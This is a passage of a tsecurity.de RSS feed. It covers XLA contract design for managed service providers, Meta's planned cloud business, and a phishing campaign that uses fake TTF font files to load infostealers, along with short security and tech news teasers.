					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Organizations usually face the same questions concerning XLAs: What should we measure, who owns the data, how should incentives work, and how will this change provider behavior after signature.</p>



<p class="wp-block-paragraph">There are no easy answers either, but after advising clients in MSP relationships with major providers, I’ve seen what works and what doesn’t. Successful XLA programs rarely start with massive transformation, nor rely on perfection before adding experience accountability to the contract.</p>



<h2 class="wp-block-heading">Start with the right metrics</h2>



<p class="wp-block-paragraph">The first concern I hear is what to measure. MSPs often steer that discussion toward metrics already in their reporting stack. That’s a trap.</p>



<p class="wp-block-paragraph">Unlike SLAs, which measure operational outputs, XLAs should focus on employee experience and <a href="https://www.cio.com/article/4166168/cios-rethink-its-operating-model-to-deliver-better-business-outcomes.html?utm=hybrid_search">business outcomes</a>. The strongest programs start with three to five high-signal metrics tied to the employee journeys creating the most friction. More than that and the program loses focus before it gains traction.</p>



<p class="wp-block-paragraph">I typically recommend starting with employee satisfaction scores, perceived lost productivity time, repeat incident rates, task completion success, and ease of getting support. Then focus early measurement on common employee experiences like service desk interactions, employee onboarding, application reliability, and device performance.</p>



<p class="wp-block-paragraph">Trying to measure everything is understandable, but it’s also one of the fastest ways to stall an XLA program.</p>



<h2 class="wp-block-heading">Precisely define roles and responsibilities</h2>



<p class="wp-block-paragraph">This is the part of XLA contract design where I spend the most time with clients, and it’s the part that major MSPs are most likely to leave vague if you let them. Accenture and TCS both have mature commercial teams skilled at agreeing to things in principle while avoiding specific accountability in writing. Don’t let that happen here.</p>



<p class="wp-block-paragraph">Employee experience isn’t solely the vendor’s responsibility. It’s genuinely shared, which is a more productive framing than pure vendor accountability, but only if the split is clearly spelled out. This is what I’ve found works in practice.</p>



<p class="wp-block-paragraph"><strong>Customer responsibilities</strong></p>



<ul class="wp-block-list">
<li>Selecting tools and platforms</li>



<li>Managing data infrastructure</li>



<li>Sharing experience data openly with the provider</li>



<li>Supporting internal improvement initiatives that the provider flags</li>
</ul>



<p class="wp-block-paragraph"><strong>Vendor responsibilities</strong></p>



<ul class="wp-block-list">
<li>Running the measurement cadence</li>



<li>Delivering monthly experience reporting</li>



<li>Identifying and surfacing improvement opportunities from the data</li>



<li>Executing operational improvements within agreed timelines</li>
</ul>



<p class="wp-block-paragraph">Without this level of specificity, XLA programs almost always become reporting exercises. The data gets collected, the scorecard gets presented, and nothing actually changes.</p>



<h2 class="wp-block-heading">Build flexible targets</h2>



<p class="wp-block-paragraph">One of the biggest mistakes in <a href="https://www.cio.com/article/4178678/your-outsourcing-contract-needs-xlas-not-just-slas.html?utm=hybrid_search">XLA design</a> is treating experience targets like traditional SLAs,  setting once at contract signing and left unchanged for years. Employee expectations, workforce patterns, and technology environments, after all, evolve constantly. A target that feels ambitious in year one may become meaningless by year three.</p>



<p class="wp-block-paragraph">The strongest XLA contracts include formal reviews every three to six months to recalibrate targets, align with business priorities, and raise expectations as experience improves. This prevents providers from locking in easy wins and coasting. When providers resist review cycles, it’s often a sign they believe the targets can be met on autopilot, a red flag in any XLA program.</p>



<h2 class="wp-block-heading">Use the right scoring method</h2>



<p class="wp-block-paragraph">One overlooked XLA best practice is how experience scores are calculated. Point-in-time scores can be distorted by outages, isolated incidents, or low survey participation, and providers sometimes exploit that volatility.</p>



<p class="wp-block-paragraph">I advise clients to calculate official XLA scores using rolling two-month averages instead of snapshots. It creates a more stable and accurate view of experience trends, and makes operational timing games much harder. Most importantly, define the scoring methodology explicitly in the contract. Don’t leave it to be worked out operationally after signing.</p>



<h2 class="wp-block-heading">Structure incentives carefully</h2>



<p class="wp-block-paragraph">Relying on penalty-only incentives is one of the most expensive XLA mistakes. On paper, the model is simple: miss the target, pay the penalty. In practice, it drives the wrong behavior. Providers focus on protecting themselves instead of improving employee experience, optimizing survey timing, and managing averages rather than solving problems collaboratively.</p>



<p class="wp-block-paragraph">I’ve seen this repeatedly in Infosys, HCL, and TCS relationships. The strongest XLA structures combine risk and reward where providers earn meaningful upside for exceeding targets, innovating, and improving outcomes. Penalties still matter, especially in mature programs, but they can’t be the only lever otherwise the contract becomes another SLA model with better branding.</p>



<h2 class="wp-block-heading">Define escalation processes</h2>



<p class="wp-block-paragraph">When experience scores fall below threshold, the contract needs to specify what happens next. This sounds obvious, but I’ve reviewed many service delivery measurement frameworks in clients’ incumbent MPS contracts that specify financial consequences without defining any collaborative process to address the underlying problem.</p>



<p class="wp-block-paragraph">The escalation language I push clients to include specifies:</p>



<ul class="wp-block-list">
<li>a joint review process triggered when scores fall below threshold.</li>



<li>root cause analysis expectations and timelines.</li>



<li>remediation planning requirements with named owners on both sides.</li>



<li>timelines for corrective action and progress reporting.</li>
</ul>



<p class="wp-block-paragraph">The framing matters as much as the mechanics. Escalation should be positioned as collaborative problem-solving, not blame assignment. Contracts that turn every missed score into a commercial dispute damage the relationship when provider engagement matters most. The best MSPs treat escalation as a shared diagnostic exercise, not a contractual confrontation.</p>



<h2 class="wp-block-heading">Establish an operating rhythm</h2>



<p class="wp-block-paragraph">Signing the contract is the beginning, not the end. In my experience, the organizations that get the most out of XLA programs are those that build a disciplined operating cadence and stick to it. The ones that treat XLAs as a reporting exercise almost never see meaningful improvement.</p>



<p class="wp-block-paragraph">This is the cadence I recommend:</p>



<p class="wp-block-paragraph"><strong>Daily</strong>: Both parties maintain live dashboards showing experience trends, application performance, regional issues, and persona-specific insights to catch emerging issues.</p>



<p class="wp-block-paragraph"><strong>Weekly</strong>: Customer and vendor teams hold focused working sessions to determine what improved experience this week, what hurt it, which remediation actions were completed, and what’s the priority for next week.</p>



<p class="wp-block-paragraph"><strong>Monthly</strong>: Formal governance meetings to review experience scores, improvement actions, root cause discussions, and cross-functional issues that need escalation.</p>



<p class="wp-block-paragraph"><strong>Biannually</strong>: Leadership steering meetings to assess overall experience performance, recalibrate targets, and align the XLA program with evolving business priorities to honestly evaluate whether or not the program is driving the outcomes the organization actually cares about.</p>



<h2 class="wp-block-heading">Common mistakes organizations make</h2>



<p class="wp-block-paragraph">After working through XLA design and implementation with clients across their MSP relationships, the failure modes are predictable. Here’s what to watch for.</p>



<p class="wp-block-paragraph"><strong>Setting targets before establishing a baseline<br></strong>Rushing into targets before understanding your current state is one of the fastest ways to create disputes. Spend the first three to six months gathering baseline data, then negotiate targets based on evidence rather than guesswork.</p>



<p class="wp-block-paragraph"><strong>Measuring too much<br></strong>More metrics don’t create more insight. Frameworks with 20 data points rarely survive operational reality. Start focused and expand gradually.</p>



<p class="wp-block-paragraph"><strong>Hiding the data<br></strong>Transparency is foundational to XLAs. Providers who obscure poor scores, especially when controlling the measurement platform, undermine the entire model. Clients who weaponize the data create the same problem. Build mutual transparency obligations into the contract.</p>



<p class="wp-block-paragraph"><strong>Over-relying on penalties<br></strong>Penalty-only structures recreate legacy SLA behaviors. Balanced incentives drive better long-term outcomes.</p>



<p class="wp-block-paragraph"><strong>Treating XLAs as static<br></strong>Employee expectations, technology, and business priorities evolve constantly. Without formal review cycles, XLA programs quickly become irrelevant<strong>.</strong></p>



<h2 class="wp-block-heading">Start smaller than you think you need to</h2>



<p class="wp-block-paragraph">The organizations that get XLAs right are rarely the ones with the most sophisticated tooling. They’re the ones that stopped waiting for a perfect program and introduced real accountability into the contract with what they had.</p>



<p class="wp-block-paragraph">The most effective starting points are often simple: agree on a focused set of experience metrics, establish a six-month review cycle, commit to shared visibility and data transparency, and create joint accountability for continuous improvement.</p>



<p class="wp-block-paragraph">From there, maturity develops over time. Governance builds trust, data becomes more actionable, and targets evolve alongside business priorities. The relationship shifts from compliance management to outcome-driven partnership.</p>



<p class="wp-block-paragraph">In my experience, the organizations that succeed are the ones that stopped accepting green scorecards at face value and demanded something more meaningful.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hackers Use Paste-and-Run Commands to Deploy ClickLock Stealer Against Mac Users]]></title>
<description><![CDATA[Hackers are actively targeting macOS users with a newly identified infostealer dubbed “ClickLock Stealer,” leveraging paste-and-run social engineering techniques to bypass Apple’s native security protections without requiring exploits or elevated privileges. Despite macOS protections such as Gate...]]></description>
<link>https://tsecurity.de/de/3675655/it-security-nachrichten/hackers-use-paste-and-run-commands-to-deploy-clicklock-stealer-against-mac-users/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675655/it-security-nachrichten/hackers-use-paste-and-run-commands-to-deploy-clicklock-stealer-against-mac-users/</guid>
<pubDate>Fri, 17 Jul 2026 11:56:00 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hackers are actively targeting macOS users with a newly identified infostealer dubbed “ClickLock Stealer,” leveraging paste-and-run social engineering techniques to bypass Apple’s native security protections without requiring exploits or elevated privileges. Despite macOS protections such as Gatekeeper, Transparency, Consent, and…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/hackers-use-paste-and-run-commands-to-deploy-clicklock-stealer-against-mac-users/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/hackers-use-paste-and-run-commands-to-deploy-clicklock-stealer-against-mac-users/">Hackers Use Paste-and-Run Commands to Deploy ClickLock Stealer Against Mac Users</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Group Behind ‘2000 Mules’ Is Back With Another Election Conspiracy Film]]></title>
<description><![CDATA[True the Vote is working with a Detroit pastor to produce a new documentary called Trap, based on claims that have already been thrown out in court.]]></description>
<link>https://tsecurity.de/de/3675646/it-nachrichten/the-group-behind-2000-mules-is-back-with-another-election-conspiracy-film/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675646/it-nachrichten/the-group-behind-2000-mules-is-back-with-another-election-conspiracy-film/</guid>
<pubDate>Fri, 17 Jul 2026 11:50:23 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[True the Vote is working with a Detroit pastor to produce a new documentary called Trap, based on claims that have already been thrown out in court.]]></content:encoded>
</item>
<item>
<title><![CDATA[Hackers Use Paste-and-Run Commands to Deploy ClickLock Stealer Against Mac Users]]></title>
<description><![CDATA[Hackers are actively targeting macOS users with a newly identified infostealer dubbed “ClickLock Stealer,” leveraging paste-and-run social engineering techniques to bypass Apple’s native security protections without requiring exploits or elevated privileges. Despite macOS protections such as Gate...]]></description>
<link>https://tsecurity.de/de/3675555/it-security-nachrichten/hackers-use-paste-and-run-commands-to-deploy-clicklock-stealer-against-mac-users/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675555/it-security-nachrichten/hackers-use-paste-and-run-commands-to-deploy-clicklock-stealer-against-mac-users/</guid>
<pubDate>Fri, 17 Jul 2026 11:09:38 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hackers are actively targeting macOS users with a newly identified infostealer dubbed “ClickLock Stealer,” leveraging paste-and-run social engineering techniques to bypass Apple’s native security protections without requiring exploits or elevated privileges. Despite macOS protections such as Gatekeeper, Transparency, Consent, and Control (TCC), System Integrity Protection (SIP), and mandatory code signing, threat actors are increasingly deploying […]</p>
<p>The post <a href="https://gbhackers.com/clicklock-stealer-against-mac-users/">Hackers Use Paste-and-Run Commands to Deploy ClickLock Stealer Against Mac Users</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Can Meta really compete in the cloud business?]]></title>
<description><![CDATA[Meta is reportedly planning a cloud business that would sell access to AI computing power and models, extending its internal infrastructure into a commercial service for outside developers and enterprises. Reuters, citing Bloomberg’s reporting, noted that the planned offering would allow customer...]]></description>
<link>https://tsecurity.de/de/3675548/ai-nachrichten/can-meta-really-compete-in-the-cloud-business/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675548/ai-nachrichten/can-meta-really-compete-in-the-cloud-business/</guid>
<pubDate>Fri, 17 Jul 2026 11:04:14 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph"><a href="https://www.bloomberg.com/news/articles/2026-07-01/meta-is-building-a-cloud-business-to-sell-excess-ai-compute">Meta is reportedly planning a cloud business</a> that would sell access to AI computing power and models, extending its internal infrastructure into a commercial service for outside developers and enterprises. Reuters, citing Bloomberg’s reporting, noted that the planned offering would allow customers to access AI models hosted on Meta’s infrastructure and pay based on usage, effectively positioning the company in the <a href="https://www.infoworld.com/article/2255598/what-is-iaas-your-data-center-in-the-cloud.html">infrastructure-as-a-service</a> and AI platform markets. On the surface, this seems like a logical next step. If you are already spending enormous amounts of money to build AI infrastructure, there is a natural temptation to ask whether some of that investment can be monetized beyond your own internal use.</p>



<p class="wp-block-paragraph">I have seen this pattern before. A company builds sophisticated internal systems, recognizes their value, and then begins to imagine that becoming a cloud provider is simply a matter of exposing those capabilities to external customers. It sounds straightforward, especially given the excitement around AI and the demand for high-performance infrastructure. But cloud computing is not just another distribution model. It is not simply a matter of offering on-demand multitenant services and charging a fee. It is a deeply operational, trust-based business in a market that punishes companies that do not fully understand what enterprise customers require.</p>



<h2 class="wp-block-heading">A crowded neocloud market</h2>



<p class="wp-block-paragraph">The first problem Meta faces is that this is not an open opportunity. The <a href="https://www.infoworld.com/article/4140865/neoclouds-run-ai-cheaper-and-better.html">neocloud</a> space, meaning purpose-built AI infrastructure delivered as a service, is already crowded and increasingly difficult to enter. Amazon, Microsoft, and Google dominate the conversation for obvious reasons. They have years of cloud operating experience, broad service portfolios, global reach, mature ecosystems, and deeply established enterprise relationships. Oracle remains a serious player as well, especially in enterprise applications, data platforms, and performance-sensitive workloads. IBM still matters in <a href="https://www.networkworld.com/article/964498/what-is-hybrid-cloud-computing.html">hybrid cloud</a>, operations, and industries where governance and regulatory rigor remain central.</p>



<p class="wp-block-paragraph">That list alone should give Meta pause. These companies are not just infrastructure vendors. They are experienced cloud operators. They have spent years building not only the underlying platforms, but also the native capabilities enterprises now expect by default. Those capabilities include security, governance, identity management, observability, support, compliance, billing controls, resilience planning, and integration with the broader enterprise technology estate. These are not secondary features. They are part of the core value proposition.</p>



<p class="wp-block-paragraph">This is why late entry into the cloud market is so hard. A new provider is not just competing on price or capacity. It is competing against accumulated trust. Enterprises are not casual buyers. They are selecting long-term operating environments for applications, data, AI models, and business-critical processes. They want confidence that the provider understands how these services will be consumed, governed, and supported over time. Meta is entering a market where the incumbents already have a major head start on all of those fronts.</p>



<h2 class="wp-block-heading">Harder than it looks</h2>



<p class="wp-block-paragraph">Over the years, I have had many technology companies come to me and say they wanted to reposition their technology in the cloud space, either as <a href="https://www.infoworld.com/article/2256637/what-is-saas-software-as-a-service-defined.html">software as a service</a> or infrastructure as a service. In the beginning, enthusiasm is always high. The technology is impressive. The market size looks attractive. The revenue models appear compelling. Investors love the story. Then we begin to walk through what it really means to operate as a cloud provider, and the optimism usually fades fast.</p>



<p class="wp-block-paragraph">The questions become very practical and very uncomfortable. How will tenants be isolated? How will <a href="https://www.csoonline.com/article/518296/what-is-iam-identity-and-access-management-explained.html">identity and access controls</a> work across different kinds of customers? What governance models will be built in natively? How will workloads be monitored, optimized, and secured? What does support look like 24 hours a day, across regions, across industries, across compliance boundaries? How will outages be handled, communicated, and remediated? How will the platform integrate with existing customer tools for operations, policy management, and security response? How much investment will it take just to become credible before you even begin to differentiate?</p>



<p class="wp-block-paragraph">Once companies fully understand the complexities, market dynamics, and the capital and execution required to compete even with secondary players, many of them back off. They realize that cloud technology is not a packaging exercise. It is a transformation in how a company designs, operates, supports, sells, and evolves technology. That is why I remain skeptical when any company assumes it can translate internal infrastructure excellence into external cloud success without a very long, disciplined commitment.</p>



<h2 class="wp-block-heading">Meta’s market readiness</h2>



<p class="wp-block-paragraph">Of course, Meta is not lacking in financial resources. If any company can afford to spend aggressively in this space, it is Meta. The company has the capital to build infrastructure, absorb losses, hire experienced talent, and stay in the market long enough to make a serious attempt. I would never argue that Meta is too small or too poor to try. Quite the opposite. If there is any non-traditional entrant with the financial scale to force itself into the conversation, Meta would be high on the list.</p>



<p class="wp-block-paragraph">But money does not erase complexity. It only gives you the chance to confront it. The real question is not whether Meta can afford to become a cloud provider. The question is whether Meta has what it takes to become an <em>excellent </em>cloud provider. Those are two very different things. Enterprises are not going to move meaningful workloads to a new platform simply because the company behind it is wealthy or technically famous. They are going to ask whether the provider understands enterprise consumption patterns, enterprise risk, enterprise governance, and enterprise operations.</p>



<p class="wp-block-paragraph">That is where the challenge becomes much more serious. Meta has extensive experience running infrastructure for itself. That is valuable, but internal operating excellence is not the same thing as external service maturity. Running systems for your own workloads allows a high degree of control over architecture, standards, priorities, and operating assumptions. Running systems for paying customers requires flexibility, consistency, transparency, and support across a wide range of use cases that you do not control. Those are very different disciplines, and companies often underestimate the gap between them.</p>



<h2 class="wp-block-heading">What exactly is Meta?</h2>



<p class="wp-block-paragraph">Another concern here is strategic clarity. Meta already has a complicated market identity. It is a social media company, an advertising platform company, a hardware company, an AI company, and still, in the minds of many, the company that spent billions pursuing the metaverse. If it now wants to be viewed as a serious cloud infrastructure provider, it will need to explain not only what it is offering, but why customers should believe this is a durable long-term commitment and not just another adjacent experiment.</p>



<p class="wp-block-paragraph">That uncertainty can be damaging. Customers want stable providers with clear strategic intent. They do not want to architect important systems around a platform if they suspect the provider may lose interest, shift direction, or reframe the business after a few years of uneven results. Cloud computing requires patience, consistency, and deep customer orientation. It is not a market where strategic ambiguity helps.</p>



<p class="wp-block-paragraph">This could become confusing for Meta internally as well. Building a true cloud business demands focus. It demands years of investment in areas that may not be glamorous but are absolutely necessary, such as governance, operations, controls, support frameworks, partner programs, and enterprise sales alignment. If the company is not willing to make those sacrifices fully and for the long term, the initiative will struggle.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Fake TTF files deliver stealthy malware in global phishing campaign]]></title>
<description><![CDATA[Threat actors are now abusing an ordinary font file to deliver low-detection malware capable of stealing credentials and establishing persistence on compromised Windows systems.



According to a new research from Fortinet’s FortiGuard Labs, a global phishing campaign is actively using heavily ob...]]></description>
<link>https://tsecurity.de/de/3675510/it-security-nachrichten/fake-ttf-files-deliver-stealthy-malware-in-global-phishing-campaign/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675510/it-security-nachrichten/fake-ttf-files-deliver-stealthy-malware-in-global-phishing-campaign/</guid>
<pubDate>Fri, 17 Jul 2026 10:54:29 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Threat actors are now abusing an ordinary font file to deliver low-detection malware capable of stealing credentials and establishing persistence on compromised Windows systems.</p>



<p class="wp-block-paragraph">According to a new research from Fortinet’s FortiGuard Labs, a global phishing campaign is actively using heavily obfuscated JavaScript and a Lua-based loader posing as a TrueType Font (TTF) file to evade security and drop RATs and infostealers.</p>



<p class="wp-block-paragraph">A TTF file is a standard font file used by operating systems and applications to display text.</p>



<p class="wp-block-paragraph">The campaign has been deploying malware families such as <a href="https://www.csoonline.com/article/573813/malware-builder-uses-fresh-tactics-to-hit-victims-with-agent-tesla-rat.html">Agent Tesla</a>, Remcos, <a href="https://www.csoonline.com/article/4064720/xworm-campaign-shows-a-shift-toward-fileless-malware-and-in-memory-evasion-tactics.html">XWorm</a>, and a Snake Keylogger variant known as Best Private LOGGER, since at least late March 2026. “In these attacks, the threat actor impersonates several well-known companies, using the guise of business cooperation to launch phishing attacks,” FortiGuard researchers said in a blog <a href="https://www.fortinet.com/blog/threat-research/the-ttf-trap-a-global-campaign-of-a-low-detection-lua-loader" target="_blank" rel="noreferrer noopener">post</a>.</p>



<p class="wp-block-paragraph">Talking about how a new attack technique seems to still rely on conventional phishing tricks, <a href="https://www.linkedin.com/in/shane-barney-69026528/" target="_blank" rel="noreferrer noopener">Shane Barney</a>, CISO at Keeper Security, said, “The most sophisticated technical evasion in the world still starts the same way: someone opens an email from what looks like a trusted company and acts on it.”</p>



<p class="wp-block-paragraph">“The obfuscation layers, the Lua loader disguised as a font file, the fileless execution chain – all of it exists to survive detection after that human decision has already been made, and organizations would do well to keep that in their sightline,” he added.</p>



<h2 class="wp-block-heading">Business and payment-themed phishing lures used</h2>



<p class="wp-block-paragraph">According to the researchers, victims receive phishing emails impersonating well-known companies and using business collaboration or payment-related themes to trick recipients into opening compressed archives. These archives contain the obfuscated JScript that establishes persistence before dropping either a legitimate Autolt executable or a LuaJIT interpreter, along with a malicious script packaged within a .ttf extension.</p>



<p class="wp-block-paragraph">The fake font file functions as a Lua-based loader that runs multiple de-obfuscation steps before decrypting and executing shellcode directly in memory.</p>



<p class="wp-block-paragraph">“Security controls cannot treat a file extension as proof of file type or intent,” said <a href="https://www.linkedin.com/in/jason-soroko-19b41920/" target="_blank" rel="noreferrer noopener">Jason Soroko</a>, senior fellow at Sectigo. “Each component (of the campaign) may appear less suspicious when reviewed alone, while the combined sequence leads to in-memory execution of RATs and infostealers.”</p>



<p class="wp-block-paragraph">Some of the new variants, the researchers pointed out, are getting more sophisticated by introducing segmented shellcode encryption, Vectored Exception Handler (VEH)- based runtime decryption, AMSI and ETW bypasses, API unhooking, and other anti-analysis techniques designed to evade endpoint defenses.</p>



<p class="wp-block-paragraph">The final malware payload is delivered using <a href="https://www.csoonline.com/article/4125567/this-stealthy-windows-rat-holds-live-conversations-with-its-operators.html?utm=hybrid_search#:~:text=This%20PowerShell%20loader%20decodes%20and%20executes%20shellcode%20generated%20using%20Donut%2C%20an%20open-source%20framework%20commonly%20used%20to%20convert.%20NET%20assemblies%20into%20position-independent%20shellcode.">Donut</a> shellcode, allowing execution without writing the payload to disk.</p>



<p class="wp-block-paragraph">Protection requires targeted mitigations and routine security hygiene</p>



<p class="wp-block-paragraph">Fortinet’s findings confirm the attackers’ endgame to be stealing credentials and maintaining long-term access. The malware families observed, including Agent Tesla, Remcos, XWorm, and Best Private LOGGER, are all focused on credential theft, surveillance, or remote access.</p>



<p class="wp-block-paragraph">Barney said organizations should resist focusing exclusively on the loader’s technical sophistication and instead strengthen the systems attackers eventually want to compromise.</p>



<p class="wp-block-paragraph">In his opinion, identity and access controls are what it comes down to, as signature-based detection often fails against the loader sophistication of this grade. “Limiting what any given set of credentials can reach, enforcing least privilege, requiring re-authentication for sensitive systems, and monitoring for anomalous session behavior will not stop every phishing email from landing, but they significantly constrain what an attacker can accomplish after one succeeds,” he explained.</p>



<p class="wp-block-paragraph">Soroko, on the other hand, recommends focusing controls on the technical indicators. He urged organizations to restrict Windows Script Host, Autolt, and LauJIT wherever they are not operationally required, monitor for behaviors such as process injection, remote memory allocation, and shellcode execution, and use Fortinet’s published indicators for threat hunting.</p>



<p class="wp-block-paragraph">The indicators of compromise (IOCs) Fortinet shared include the command-and-control (C2) addresses, file hashes, and filenames.</p>



<p class="wp-block-paragraph">Soroko warned against relying solely on hashes or C2 infrastructure because the loader has changed over time. “The stronger approach is to detect the stable behavior across versions, then test controls against the complete chain,” he said.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[New ClickLock Stealer Uses Fake Cloudflare Verification to Compromise macOS Users]]></title>
<description><![CDATA[A newly identified macOS malware dubbed ClickLock Stealer is leveraging fake Cloudflare verification prompts and ClickFix-style social engineering to compromise users without requiring exploits or elevated privileges, according to Group-IB researchers. The malware, discovered in June 2026 with ze...]]></description>
<link>https://tsecurity.de/de/3675384/it-security-nachrichten/new-clicklock-stealer-uses-fake-cloudflare-verification-to-compromise-macos-users/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675384/it-security-nachrichten/new-clicklock-stealer-uses-fake-cloudflare-verification-to-compromise-macos-users/</guid>
<pubDate>Fri, 17 Jul 2026 09:39:13 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A newly identified macOS malware dubbed ClickLock Stealer is leveraging fake Cloudflare verification prompts and ClickFix-style social engineering to compromise users without requiring exploits or elevated privileges, according to Group-IB researchers. The malware, discovered in June 2026 with zero detections on VirusTotal, highlights a growing shift in macOS threats toward deception-driven attacks. While macOS malware […]</p>
<p>The post <a href="https://cyberpress.org/clicklock-stealer-cloudflare-trap/">New ClickLock Stealer Uses Fake Cloudflare Verification to Compromise macOS Users</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Here’s Why Anthropic Is Pushing States to Regulate AI Faster]]></title>
<description><![CDATA[The company endorsed landmark AI transparency laws in California and New York last year, but its head of US state and local policy says they may already be outdated.]]></description>
<link>https://tsecurity.de/de/3674424/it-nachrichten/heres-why-anthropic-is-pushing-states-to-regulate-ai-faster/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674424/it-nachrichten/heres-why-anthropic-is-pushing-states-to-regulate-ai-faster/</guid>
<pubDate>Thu, 16 Jul 2026 20:47:15 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The company endorsed landmark AI transparency laws in California and New York last year, but its head of US state and local policy says they may already be outdated.]]></content:encoded>
</item>
<item>
<title><![CDATA[47 requests, zero answers — How Proton VPN keeps saying no to data demands]]></title>
<description><![CDATA[Proton VPN's updated transparency report shows 47 data requests in the first half of 2026. These were all rejected because its audited no-logs policy leaves nothing to hand over.]]></description>
<link>https://tsecurity.de/de/3674194/it-nachrichten/47-requests-zero-answers-how-proton-vpn-keeps-saying-no-to-data-demands/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674194/it-nachrichten/47-requests-zero-answers-how-proton-vpn-keeps-saying-no-to-data-demands/</guid>
<pubDate>Thu, 16 Jul 2026 18:47:44 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Proton VPN's updated transparency report shows 47 data requests in the first half of 2026. These were all rejected because its audited no-logs policy leaves nothing to hand over.]]></content:encoded>
</item>
<item>
<title><![CDATA[FT readers respond: What is the real cost of AI?]]></title>
<description><![CDATA[Commenters discuss the environmental impact of AI data centres and the need for greater transparency — join the debate]]></description>
<link>https://tsecurity.de/de/3673812/ai-nachrichten/ft-readers-respond-what-is-the-real-cost-of-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673812/ai-nachrichten/ft-readers-respond-what-is-the-real-cost-of-ai/</guid>
<pubDate>Thu, 16 Jul 2026 16:33:41 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Commenters discuss the environmental impact of AI data centres and the need for greater transparency — join the debate]]></content:encoded>
</item>
<item>
<title><![CDATA[The TTF Trap: A Global Campaign of a Low-Detection Lua Loader]]></title>
<description><![CDATA[FortiGuard Labs analyzes a global phishing campaign using obfuscated JScript, disguised .ttf files, and Lua loaders to deliver RATs and infostealers.        This article has been indexed from FortiGuard Labs Threat Research Read the original article: The TTF Trap: A…
Read more →
The post The TTF ...]]></description>
<link>https://tsecurity.de/de/3673770/it-security-nachrichten/the-ttf-trap-a-global-campaign-of-a-low-detection-lua-loader/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673770/it-security-nachrichten/the-ttf-trap-a-global-campaign-of-a-low-detection-lua-loader/</guid>
<pubDate>Thu, 16 Jul 2026 16:23:17 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>FortiGuard Labs analyzes a global phishing campaign using obfuscated JScript, disguised .ttf files, and Lua loaders to deliver RATs and infostealers.        This article has been indexed from FortiGuard Labs Threat Research Read the original article: The TTF Trap: A…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/the-ttf-trap-a-global-campaign-of-a-low-detection-lua-loader/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/the-ttf-trap-a-global-campaign-of-a-low-detection-lua-loader/">The TTF Trap: A Global Campaign of a Low-Detection Lua Loader</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[EFF: Apple the only major wearable vendor offering E2EE for health data]]></title>
<description><![CDATA[The Electronic Frontier Foundation (EFF) says Apple is the only major wearable manufacturer among ten leading brands it examined that offers end-to-end encryption for users' cloud-synchronized health data. The privacy group's review also found that transparency around government data requests rem...]]></description>
<link>https://tsecurity.de/de/3673145/it-security-nachrichten/eff-apple-the-only-major-wearable-vendor-offering-e2ee-for-health-data/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673145/it-security-nachrichten/eff-apple-the-only-major-wearable-vendor-offering-e2ee-for-health-data/</guid>
<pubDate>Thu, 16 Jul 2026 12:54:40 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
